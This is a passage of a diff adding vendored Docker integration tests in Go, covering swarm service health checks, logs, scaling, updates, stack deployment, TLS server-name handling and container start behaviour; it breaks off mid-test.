diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go
new file mode 100644
index 0000000000..30580f6be3
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_health_test.go
@@ -0,0 +1,191 @@
+// +build !windows
+
+package main
+
+import (
+	"strconv"
+	"strings"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/daemon/cluster/executor/container"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// start a service, and then make its task unhealthy during running
+// finally, unhealthy task should be detected and killed
+func (s *DockerSwarmSuite) TestServiceHealthRun(c *check.C) {
+	testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows
+
+	d := s.AddDaemon(c, true, true)
+
+	// build image with health-check
+	// note: use `daemon.buildImageWithOut` to build, do not use `buildImage` to build
+	imageName := "testhealth"
+	_, _, err := d.buildImageWithOut(imageName,
+		`FROM busybox
+		RUN touch /status
+		HEALTHCHECK --interval=1s --timeout=1s --retries=1\
+		  CMD cat /status`,
+		true)
+	c.Check(err, check.IsNil)
+
+	serviceName := "healthServiceRun"
+	out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	id := strings.TrimSpace(out)
+
+	var tasks []swarm.Task
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		tasks = d.getServiceTasks(c, id)
+		return tasks, nil
+	}, checker.HasLen, 1)
+
+	task := tasks[0]
+
+	// wait for task to start
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		task = d.getTask(c, task.ID)
+		return task.Status.State, nil
+	}, checker.Equals, swarm.TaskStateRunning)
+	containerID := task.Status.ContainerStatus.ContainerID
+
+	// wait for container to be healthy
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		out, _ := d.Cmd("inspect", "--format={{.State.Health.Status}}", containerID)
+		return strings.TrimSpace(out), nil
+	}, checker.Equals, "healthy")
+
+	// make it fail
+	d.Cmd("exec", containerID, "rm", "/status")
+	// wait for container to be unhealthy
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		out, _ := d.Cmd("inspect", "--format={{.State.Health.Status}}", containerID)
+		return strings.TrimSpace(out), nil
+	}, checker.Equals, "unhealthy")
+
+	// Task should be terminated
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		task = d.getTask(c, task.ID)
+		return task.Status.State, nil
+	}, checker.Equals, swarm.TaskStateFailed)
+
+	if !strings.Contains(task.Status.Err, container.ErrContainerUnhealthy.Error()) {
+		c.Fatal("unhealthy task exits because of other error")
+	}
+}
+
+// start a service whose task is unhealthy at beginning
+// its tasks should be blocked in starting stage, until health check is passed
+func (s *DockerSwarmSuite) TestServiceHealthStart(c *check.C) {
+	testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows
+
+	d := s.AddDaemon(c, true, true)
+
+	// service started from this image won't pass health check
+	imageName := "testhealth"
+	_, _, err := d.buildImageWithOut(imageName,
+		`FROM busybox
+		HEALTHCHECK --interval=1s --timeout=1s --retries=1024\
+		  CMD cat /status`,
+		true)
+	c.Check(err, check.IsNil)
+
+	serviceName := "healthServiceStart"
+	out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	id := strings.TrimSpace(out)
+
+	var tasks []swarm.Task
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		tasks = d.getServiceTasks(c, id)
+		return tasks, nil
+	}, checker.HasLen, 1)
+
+	task := tasks[0]
+
+	// wait for task to start
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		task = d.getTask(c, task.ID)
+		return task.Status.State, nil
+	}, checker.Equals, swarm.TaskStateStarting)
+
+	containerID := task.Status.ContainerStatus.ContainerID
+
+	// wait for health check to work
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		out, _ := d.Cmd("inspect", "--format={{.State.Health.FailingStreak}}", containerID)
+		failingStreak, _ := strconv.Atoi(strings.TrimSpace(out))
+		return failingStreak, nil
+	}, checker.GreaterThan, 0)
+
+	// task should be blocked at starting status
+	task = d.getTask(c, task.ID)
+	c.Assert(task.Status.State, check.Equals, swarm.TaskStateStarting)
+
+	// make it healthy
+	d.Cmd("exec", containerID, "touch", "/status")
+
+	// Task should be at running status
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		task = d.getTask(c, task.ID)
+		return task.Status.State, nil
+	}, checker.Equals, swarm.TaskStateRunning)
+}
+
+// start a service whose task is unhealthy at beginning
+// its tasks should be blocked in starting stage, until health check is passed
+func (s *DockerSwarmSuite) TestServiceHealthUpdate(c *check.C) {
+	testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows
+
+	d := s.AddDaemon(c, true, true)
+
+	// service started from this image won't pass health check
+	imageName := "testhealth"
+	_, _, err := d.buildImageWithOut(imageName,
+		`FROM busybox
+		HEALTHCHECK --interval=1s --timeout=1s --retries=1024\
+		  CMD cat /status`,
+		true)
+	c.Check(err, check.IsNil)
+
+	serviceName := "healthServiceStart"
+	out, err := d.Cmd("service", "create", "--name", serviceName, imageName, "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	id := strings.TrimSpace(out)
+
+	var tasks []swarm.Task
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		tasks = d.getServiceTasks(c, id)
+		return tasks, nil
+	}, checker.HasLen, 1)
+
+	task := tasks[0]
+
+	// wait for task to start
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		task = d.getTask(c, task.ID)
+		return task.Status.State, nil
+	}, checker.Equals, swarm.TaskStateStarting)
+
+	containerID := task.Status.ContainerStatus.ContainerID
+
+	// wait for health check to work
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		out, _ := d.Cmd("inspect", "--format={{.State.Health.FailingStreak}}", containerID)
+		failingStreak, _ := strconv.Atoi(strings.TrimSpace(out))
+		return failingStreak, nil
+	}, checker.GreaterThan, 0)
+
+	// task should be blocked at starting status
+	task = d.getTask(c, task.ID)
+	c.Assert(task.Status.State, check.Equals, swarm.TaskStateStarting)
+
+	// make it healthy
+	d.Cmd("exec", containerID, "touch", "/status")
+	// Task should be at running status
+	waitAndAssert(c, defaultReconciliationTimeout, func(c *check.C) (interface{}, check.CommentInterface) {
+		task = d.getTask(c, task.ID)
+		return task.Status.State, nil
+	}, checker.Equals, swarm.TaskStateRunning)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go
new file mode 100644
index 0000000000..c2216543d7
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_logs_experimental_test.go
@@ -0,0 +1,96 @@
+// +build !windows
+
+package main
+
+import (
+	"bufio"
+	"fmt"
+	"io"
+	"os/exec"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+type logMessage struct {
+	err  error
+	data []byte
+}
+
+func (s *DockerSwarmSuite) TestServiceLogs(c *check.C) {
+	testRequires(c, ExperimentalDaemon)
+
+	d := s.AddDaemon(c, true, true)
+
+	// we have multiple services here for detecting the goroutine issue #28915
+	services := map[string]string{
+		"TestServiceLogs1": "hello1",
+		"TestServiceLogs2": "hello2",
+	}
+
+	for name, message := range services {
+		out, err := d.Cmd("service", "create", "--name", name, "busybox",
+			"sh", "-c", fmt.Sprintf("echo %s; tail -f /dev/null", message))
+		c.Assert(err, checker.IsNil)
+		c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+	}
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout,
+		d.checkActiveContainerCount, checker.Equals, len(services))
+
+	for name, message := range services {
+		out, err := d.Cmd("service", "logs", name)
+		c.Assert(err, checker.IsNil)
+		c.Logf("log for %q: %q", name, out)
+		c.Assert(out, checker.Contains, message)
+	}
+}
+
+func (s *DockerSwarmSuite) TestServiceLogsFollow(c *check.C) {
+	testRequires(c, ExperimentalDaemon)
+
+	d := s.AddDaemon(c, true, true)
+
+	name := "TestServiceLogsFollow"
+
+	out, err := d.Cmd("service", "create", "--name", name, "busybox", "sh", "-c", "while true; do echo log test; sleep 0.1; done")
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "")
+
+	// make sure task has been deployed.
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+
+	args := []string{"service", "logs", "-f", name}
+	cmd := exec.Command(dockerBinary, d.prependHostArg(args)...)
+	r, w := io.Pipe()
+	cmd.Stdout = w
+	cmd.Stderr = w
+	c.Assert(cmd.Start(), checker.IsNil)
+
+	// Make sure pipe is written to
+	ch := make(chan *logMessage)
+	done := make(chan struct{})
+	go func() {
+		reader := bufio.NewReader(r)
+		for {
+			msg := &logMessage{}
+			msg.data, _, msg.err = reader.ReadLine()
+			select {
+			case ch <- msg:
+			case <-done:
+				return
+			}
+		}
+	}()
+
+	for i := 0; i < 3; i++ {
+		msg := <-ch
+		c.Assert(msg.err, checker.IsNil)
+		c.Assert(string(msg.data), checker.Contains, "log test")
+	}
+	close(done)
+
+	c.Assert(cmd.Process.Kill(), checker.IsNil)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go
new file mode 100644
index 0000000000..29cca2358d
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_scale_test.go
@@ -0,0 +1,57 @@
+// +build !windows
+
+package main
+
+import (
+	"fmt"
+	"strings"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSwarmSuite) TestServiceScale(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	service1Name := "TestService1"
+	service1Args := append([]string{"service", "create", "--name", service1Name, defaultSleepImage}, sleepCommandForDaemonPlatform()...)
+
+	// global mode
+	service2Name := "TestService2"
+	service2Args := append([]string{"service", "create", "--name", service2Name, "--mode=global", defaultSleepImage}, sleepCommandForDaemonPlatform()...)
+
+	// Create services
+	out, err := d.Cmd(service1Args...)
+	c.Assert(err, checker.IsNil)
+
+	out, err = d.Cmd(service2Args...)
+	c.Assert(err, checker.IsNil)
+
+	out, err = d.Cmd("service", "scale", "TestService1=2")
+	c.Assert(err, checker.IsNil)
+
+	out, err = d.Cmd("service", "scale", "TestService1=foobar")
+	c.Assert(err, checker.NotNil)
+
+	str := fmt.Sprintf("%s: invalid replicas value %s", service1Name, "foobar")
+	if !strings.Contains(out, str) {
+		c.Errorf("got: %s, expected has sub string: %s", out, str)
+	}
+
+	out, err = d.Cmd("service", "scale", "TestService1=-1")
+	c.Assert(err, checker.NotNil)
+
+	str = fmt.Sprintf("%s: invalid replicas value %s", service1Name, "-1")
+	if !strings.Contains(out, str) {
+		c.Errorf("got: %s, expected has sub string: %s", out, str)
+	}
+
+	// TestService2 is a global mode
+	out, err = d.Cmd("service", "scale", "TestService2=2")
+	c.Assert(err, checker.NotNil)
+
+	str = fmt.Sprintf("%s: scale can only be used with replicated mode\n", service2Name)
+	if out != str {
+		c.Errorf("got: %s, expected: %s", out, str)
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go
new file mode 100644
index 0000000000..837370ceeb
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_service_update_test.go
@@ -0,0 +1,130 @@
+// +build !windows
+
+package main
+
+import (
+	"encoding/json"
+	"fmt"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSwarmSuite) TestServiceUpdatePort(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	serviceName := "TestServiceUpdatePort"
+	serviceArgs := append([]string{"service", "create", "--name", serviceName, "-p", "8080:8081", defaultSleepImage}, sleepCommandForDaemonPlatform()...)
+
+	// Create a service with a port mapping of 8080:8081.
+	out, err := d.Cmd(serviceArgs...)
+	c.Assert(err, checker.IsNil)
+	waitAndAssert(c, defaultReconciliationTimeout, d.checkActiveContainerCount, checker.Equals, 1)
+
+	// Update the service: changed the port mapping from 8080:8081 to 8082:8083.
+	_, err = d.Cmd("service", "update", "--publish-add", "8082:8083", "--publish-rm", "8081", serviceName)
+	c.Assert(err, checker.IsNil)
+
+	// Inspect the service and verify port mapping
+	expected := []swarm.PortConfig{
+		{
+			Protocol:      "tcp",
+			PublishedPort: 8082,
+			TargetPort:    8083,
+			PublishMode:   "ingress",
+		},
+	}
+
+	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.EndpointSpec.Ports }}", serviceName)
+	c.Assert(err, checker.IsNil)
+
+	var portConfig []swarm.PortConfig
+	if err := json.Unmarshal([]byte(out), &portConfig); err != nil {
+		c.Fatalf("invalid JSON in inspect result: %v (%s)", err, out)
+	}
+	c.Assert(portConfig, checker.DeepEquals, expected)
+}
+
+func (s *DockerSwarmSuite) TestServiceUpdateLabel(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+	out, err := d.Cmd("service", "create", "--name=test", "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	service := d.getService(c, "test")
+	c.Assert(service.Spec.Labels, checker.HasLen, 0)
+
+	// add label to empty set
+	out, err = d.Cmd("service", "update", "test", "--label-add", "foo=bar")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	service = d.getService(c, "test")
+	c.Assert(service.Spec.Labels, checker.HasLen, 1)
+	c.Assert(service.Spec.Labels["foo"], checker.Equals, "bar")
+
+	// add label to non-empty set
+	out, err = d.Cmd("service", "update", "test", "--label-add", "foo2=bar")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	service = d.getService(c, "test")
+	c.Assert(service.Spec.Labels, checker.HasLen, 2)
+	c.Assert(service.Spec.Labels["foo2"], checker.Equals, "bar")
+
+	out, err = d.Cmd("service", "update", "test", "--label-rm", "foo2")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	service = d.getService(c, "test")
+	c.Assert(service.Spec.Labels, checker.HasLen, 1)
+	c.Assert(service.Spec.Labels["foo2"], checker.Equals, "")
+
+	out, err = d.Cmd("service", "update", "test", "--label-rm", "foo")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	service = d.getService(c, "test")
+	c.Assert(service.Spec.Labels, checker.HasLen, 0)
+	c.Assert(service.Spec.Labels["foo"], checker.Equals, "")
+
+	// now make sure we can add again
+	out, err = d.Cmd("service", "update", "test", "--label-add", "foo=bar")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	service = d.getService(c, "test")
+	c.Assert(service.Spec.Labels, checker.HasLen, 1)
+	c.Assert(service.Spec.Labels["foo"], checker.Equals, "bar")
+}
+
+func (s *DockerSwarmSuite) TestServiceUpdateSecrets(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+	testName := "test_secret"
+	id := d.createSecret(c, swarm.SecretSpec{
+		swarm.Annotations{
+			Name: testName,
+		},
+		[]byte("TESTINGDATA"),
+	})
+	c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("secrets: %s", id))
+	testTarget := "testing"
+	serviceName := "test"
+
+	out, err := d.Cmd("service", "create", "--name", serviceName, "busybox", "top")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	// add secret
+	out, err = d.cmdRetryOutOfSequence("service", "update", "test", "--secret-add", fmt.Sprintf("source=%s,target=%s", testName, testTarget))
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName)
+	c.Assert(err, checker.IsNil)
+
+	var refs []swarm.SecretReference
+	c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)
+	c.Assert(refs, checker.HasLen, 1)
+
+	c.Assert(refs[0].SecretName, checker.Equals, testName)
+	c.Assert(refs[0].File, checker.Not(checker.IsNil))
+	c.Assert(refs[0].File.Name, checker.Equals, testTarget)
+
+	// remove
+	out, err = d.cmdRetryOutOfSequence("service", "update", "test", "--secret-rm", testName)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", serviceName)
+	c.Assert(err, checker.IsNil)
+
+	c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)
+	c.Assert(refs, checker.HasLen, 0)
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go
new file mode 100644
index 0000000000..fb896d52d5
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_sni_test.go
@@ -0,0 +1,44 @@
+package main
+
+import (
+	"fmt"
+	"io/ioutil"
+	"log"
+	"net/http"
+	"net/http/httptest"
+	"net/url"
+	"os/exec"
+	"strings"
+
+	"github.com/go-check/check"
+)
+
+func (s *DockerSuite) TestClientSetsTLSServerName(c *check.C) {
+	c.Skip("Flakey test")
+	// there may be more than one hit to the server for each registry request
+	serverNameReceived := []string{}
+	var serverName string
+
+	virtualHostServer := httptest.NewTLSServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
+		serverNameReceived = append(serverNameReceived, r.TLS.ServerName)
+	}))
+	defer virtualHostServer.Close()
+	// discard TLS handshake errors written by default to os.Stderr
+	virtualHostServer.Config.ErrorLog = log.New(ioutil.Discard, "", 0)
+
+	u, err := url.Parse(virtualHostServer.URL)
+	c.Assert(err, check.IsNil)
+	hostPort := u.Host
+	serverName = strings.Split(hostPort, ":")[0]
+
+	repoName := fmt.Sprintf("%v/dockercli/image:latest", hostPort)
+	cmd := exec.Command(dockerBinary, "pull", repoName)
+	cmd.Run()
+
+	// check that the fake server was hit at least once
+	c.Assert(len(serverNameReceived) > 0, check.Equals, true)
+	// check that for each hit the right server name was received
+	for _, item := range serverNameReceived {
+		c.Check(item, check.Equals, serverName)
+	}
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go
new file mode 100644
index 0000000000..fd9b15449d
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_stack_test.go
@@ -0,0 +1,186 @@
+package main
+
+import (
+	"encoding/json"
+	"io/ioutil"
+	"os"
+	"sort"
+	"strings"
+
+	"github.com/docker/docker/api/types/swarm"
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+func (s *DockerSwarmSuite) TestStackRemoveUnknown(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	stackArgs := append([]string{"stack", "remove", "UNKNOWN_STACK"})
+
+	out, err := d.Cmd(stackArgs...)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n")
+}
+
+func (s *DockerSwarmSuite) TestStackPSUnknown(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	stackArgs := append([]string{"stack", "ps", "UNKNOWN_STACK"})
+
+	out, err := d.Cmd(stackArgs...)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n")
+}
+
+func (s *DockerSwarmSuite) TestStackServicesUnknown(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	stackArgs := append([]string{"stack", "services", "UNKNOWN_STACK"})
+
+	out, err := d.Cmd(stackArgs...)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, check.Equals, "Nothing found in stack: UNKNOWN_STACK\n")
+}
+
+func (s *DockerSwarmSuite) TestStackDeployComposeFile(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	testStackName := "testdeploy"
+	stackArgs := []string{
+		"stack", "deploy",
+		"--compose-file", "fixtures/deploy/default.yaml",
+		testStackName,
+	}
+	out, err := d.Cmd(stackArgs...)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("stack", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, check.Equals, "NAME        SERVICES\n"+"testdeploy  2\n")
+
+	out, err = d.Cmd("stack", "rm", testStackName)
+	c.Assert(err, checker.IsNil)
+	out, err = d.Cmd("stack", "ls")
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, check.Equals, "NAME  SERVICES\n")
+}
+
+func (s *DockerSwarmSuite) TestStackDeployWithSecretsTwice(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	out, err := d.Cmd("secret", "create", "outside", "fixtures/secrets/default")
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	testStackName := "testdeploy"
+	stackArgs := []string{
+		"stack", "deploy",
+		"--compose-file", "fixtures/deploy/secrets.yaml",
+		testStackName,
+	}
+	out, err = d.Cmd(stackArgs...)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("service", "inspect", "--format", "{{ json .Spec.TaskTemplate.ContainerSpec.Secrets }}", "testdeploy_web")
+	c.Assert(err, checker.IsNil)
+
+	var refs []swarm.SecretReference
+	c.Assert(json.Unmarshal([]byte(out), &refs), checker.IsNil)
+	c.Assert(refs, checker.HasLen, 3)
+
+	sort.Sort(sortSecrets(refs))
+	c.Assert(refs[0].SecretName, checker.Equals, "outside")
+	c.Assert(refs[1].SecretName, checker.Equals, "testdeploy_special")
+	c.Assert(refs[1].File.Name, checker.Equals, "special")
+	c.Assert(refs[2].SecretName, checker.Equals, "testdeploy_super")
+	c.Assert(refs[2].File.Name, checker.Equals, "foo.txt")
+	c.Assert(refs[2].File.Mode, checker.Equals, os.FileMode(0400))
+
+	// Deploy again to ensure there are no errors when secret hasn't changed
+	out, err = d.Cmd(stackArgs...)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+}
+
+func (s *DockerSwarmSuite) TestStackRemove(c *check.C) {
+	d := s.AddDaemon(c, true, true)
+
+	stackName := "testdeploy"
+	stackArgs := []string{
+		"stack", "deploy",
+		"--compose-file", "fixtures/deploy/remove.yaml",
+		stackName,
+	}
+	out, err := d.Cmd(stackArgs...)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+
+	out, err = d.Cmd("stack", "ps", stackName)
+	c.Assert(err, checker.IsNil)
+	c.Assert(strings.Split(strings.TrimSpace(out), "\n"), checker.HasLen, 2)
+
+	out, err = d.Cmd("stack", "rm", stackName)
+	c.Assert(err, checker.IsNil, check.Commentf(out))
+	c.Assert(out, checker.Contains, "Removing service testdeploy_web")
+	c.Assert(out, checker.Contains, "Removing network testdeploy_default")
+	c.Assert(out, checker.Contains, "Removing secret testdeploy_special")
+}
+
+type sortSecrets []swarm.SecretReference
+
+func (s sortSecrets) Len() int           { return len(s) }
+func (s sortSecrets) Swap(i, j int)      { s[i], s[j] = s[j], s[i] }
+func (s sortSecrets) Less(i, j int) bool { return s[i].SecretName < s[j].SecretName }
+
+// testDAB is the DAB JSON used for testing.
+// TODO: Use template/text and substitute "Image" with the result of
+// `docker inspect --format '{{index .RepoDigests 0}}' busybox:latest`
+const testDAB = `{
+    "Version": "0.1",
+    "Services": {
+	"srv1": {
+	    "Image": "busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0",
+	    "Command": ["top"]
+	},
+	"srv2": {
+	    "Image": "busybox@sha256:e4f93f6ed15a0cdd342f5aae387886fba0ab98af0a102da6276eaf24d6e6ade0",
+	    "Command": ["tail"],
+	    "Args": ["-f", "/dev/null"]
+	}
+    }
+}`
+
+func (s *DockerSwarmSuite) TestStackDeployWithDAB(c *check.C) {
+	testRequires(c, ExperimentalDaemon)
+	// setup
+	testStackName := "test"
+	testDABFileName := testStackName + ".dab"
+	defer os.RemoveAll(testDABFileName)
+	err := ioutil.WriteFile(testDABFileName, []byte(testDAB), 0444)
+	c.Assert(err, checker.IsNil)
+	d := s.AddDaemon(c, true, true)
+	// deploy
+	stackArgs := []string{
+		"stack", "deploy",
+		"--bundle-file", testDABFileName,
+		testStackName,
+	}
+	out, err := d.Cmd(stackArgs...)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "Loading bundle from test.dab\n")
+	c.Assert(out, checker.Contains, "Creating service test_srv1\n")
+	c.Assert(out, checker.Contains, "Creating service test_srv2\n")
+	// ls
+	stackArgs = []string{"stack", "ls"}
+	out, err = d.Cmd(stackArgs...)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, check.Equals, "NAME  SERVICES\n"+"test  2\n")
+	// rm
+	stackArgs = []string{"stack", "rm", testStackName}
+	out, err = d.Cmd(stackArgs...)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, checker.Contains, "Removing service test_srv1\n")
+	c.Assert(out, checker.Contains, "Removing service test_srv2\n")
+	// ls (empty)
+	stackArgs = []string{"stack", "ls"}
+	out, err = d.Cmd(stackArgs...)
+	c.Assert(err, checker.IsNil)
+	c.Assert(out, check.Equals, "NAME  SERVICES\n")
+}
diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go
new file mode 100644
index 0000000000..b1cea35872
--- /dev/null
+++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_start_test.go
@@ -0,0 +1,199 @@
+package main
+
+import (
+	"fmt"
+	"os/exec"
+	"strings"
+	"time"
+
+	"github.com/docker/docker/pkg/integration/checker"
+	"github.com/go-check/check"
+)
+
+// Regression test for https://github.com/docker/docker/issues/7843
+func (s *DockerSuite) TestStartAttachReturnsOnError(c *check.C) {
+	// Windows does not support link
+	testRequires(c, DaemonIsLinux)
+	dockerCmd(c, "run", "--name", "test", "busybox")
+
+	// Expect this to fail because the above container is stopped, this is what we want
+	out, _, err := dockerCmdWithError("run", "--name", "test2", "--link", "test:test", "busybox")
+	// err shouldn't be nil because container test2 try to link to stopped container
+	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+
+	ch := make(chan error)
+	go func() {
+		// Attempt to start attached to the container that won't start
+		// This should return an error immediately since the container can't be started
+		if out, _, err := dockerCmdWithError("start", "-a", "test2"); err == nil {
+			ch <- fmt.Errorf("Expected error but got none:\n%s", out)
+		}
+		close(ch)
+	}()
+
+	select {
+	case err := <-ch:
+		c.Assert(err, check.IsNil)
+	case <-time.After(5 * time.Second):
+		c.Fatalf("Attach did not exit properly")
+	}
+}
+
+// gh#8555: Exit code should be passed through when using start -a
+func (s *DockerSuite) TestStartAttachCorrectExitCode(c *check.C) {
+	testRequires(c, DaemonIsLinux)
+	out, _, _ := dockerCmdWithStdoutStderr(c, "run", "-d", "busybox", "sh", "-c", "sleep 2; exit 1")
+	out = strings.TrimSpace(out)
+
+	// make sure the container has exited before trying the "start -a"
+	dockerCmd(c, "wait", out)
+
+	startOut, exitCode, err := dockerCmdWithError("start", "-a", out)
+	// start command should fail
+	c.Assert(err, checker.NotNil, check.Commentf("startOut: %s", startOut))
+	// start -a did not respond with proper exit code
+	c.Assert(exitCode, checker.Equals, 1, check.Commentf("startOut: %s", startOut))
+
+}
+
+func (s *DockerSuite) TestStartAttachSilent(c *check.C) {
+	name := "teststartattachcorrectexitcode"
+	dockerCmd(c, "run", "--name", name, "busybox", "echo", "test")
+
+	// make sure the container has exited before trying the "start -a"
+	dockerCmd(c, "wait", name)
+
+	startOut, _ := dockerCmd(c, "start", "-a", name)
+	// start -a produced unexpected output
+	c.Assert(startOut, checker.Equals, "test\n")
+}
+
+func (s *DockerSuite) TestStartRecordError(c *check.C) {
+	// TODO Windows CI: Requires further porting work. Should be possible.
+	testRequires(c, DaemonIsLinux)
+	// when container runs successfully, we should not have state.Error
+	dockerCmd(c, "run", "-d", "-p", "9999:9999", "--name", "test", "busybox", "top")
+	stateErr := inspectField(c, "test", "State.Error")
+	// Expected to not have state error
+	c.Assert(stateErr, checker.Equals, "")
+
+	// Expect this to fail and records error because of ports conflict
+	out, _, err := dockerCmdWithError("run", "-d", "--name", "test2", "-p", "9999:9999", "busybox", "top")
+	// err shouldn't be nil because docker run will fail
+	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
+
+	stateErr = inspectField(c, "test2", "State.Error")
+	c.Assert(stateErr, checker.Contains, "port is already allocated")
+
+	// Expect the conflict to be resolved when we stop the initial container
+	dockerCmd(c, "stop", "test")
+	dockerCmd(c, "start", "test2")
+	stateErr = inspectField(c, "test2", "State.Error")
+	// Expected to not have state error but got one
+	c.Assert(stateErr, checker.Equals, "")
+}
+
+func (s *DockerSuite) TestStartPausedContainer(c *check.C) {
+	// Windows does not support pausing containers
+	testRequires(c, IsPausable)
+	defer unpauseAllContainers()
+
+	runSleepingContainer(c, "-d", "--name", "testing")
+
+	dockerCmd(c, "pause", "testing")
+
+	out, _, err := dockerCmdWithError("start", "testing")
+	// an error should have been shown that you cannot start paused container
+	c.Assert(err, checker.NotNil, check.Commentf("out: %s", out))
